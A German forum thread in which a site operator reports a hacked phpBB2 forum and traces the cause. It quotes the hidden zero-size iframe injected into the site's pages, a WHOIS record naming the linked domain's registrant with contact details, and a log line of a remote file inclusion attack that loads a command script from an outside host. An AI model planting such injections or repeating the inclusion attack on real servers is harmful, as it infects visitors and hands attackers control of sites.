Heute nacht um 02:42 wurde offensichtlich eines meiner phpBB2-Foren gehackt und an jede index.htm und verschiedene .php-Dateien folgendes angehängt:


<br><html><iframe src=http://www.kgeba.com/portal/index.php?aff=eduardo width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>

sinnigerweise nach /html bzw dem php-end-tag, so dass es dem Besucher nicht weiter auffällt.
IP war 200.97.214.1 bzw.200.182.227.94. Google sagt darüber noch nichts. Weiß jemand näheres?

Na, herzliche Grüße aus Curaçao...

War Dein phpBB aktuell oder älteren Update-Stands???
Nur so informativ für alle Forenbetreiber...

Q


< Registration Service Provided By: Gold-Domain, Inc.
< Contact: support @ gold-domain . com
< Visit: http://www.gold-domain.com
<
< Domain name: www.kgeba.com
<
< Registrant Contact:
< ShuPin
< Fan ShuangPing (zxyingyu [at] 126.com)
< +1.3913306350
< Fax: none
< 26th middle school
< Jiaozuo, Henan 454100
< CN
<
< Administrative Contact:
< ShuPin
< Fan ShuangPing (zxyingyu [at] 126.com)
< +1.3913306350
< Fax: none
< 26th middle school
< Jiaozuo, Henan 454100
< CN
<
< Technical Contact:
< ShuPin
< Fan ShuangPing (zxyingyu [at] 126.com)
< +1.3913306350
< Fax: none
< 26th middle school
< Jiaozuo, Henan 454100
< CN
<
< Status: Locked
<
< Name Servers:
< dns1.name-services.com
< dns2.name-services.com
< dns3.name-services.com
< dns4.name-services.com
< dns5.name-services.com
<
< Creation date: 12 Dec 2005 xx:xx:xx
< Expiration date: 12 Dec 2006 xx:xx:xx

ich glaube, mittlerweile die Schwachstelle gefunden zu haben:

ein älteres phpBB2-Forum (2.06) als Modul unter mambo, das zwar deaktiviert, aber nicht gelöscht war:

200.97.214.1 - - [09/Jul/20xx:xx:xx:48 +0200] "GET /components/com_forum/downloads.php?phpbb_root_path=http://geocities.yahoo.com.br/juventudedosamba2003/cmd.txt?&cmd=ls%20-l%20/kunden/XXXXXX_XXXXX HTTP/1.1"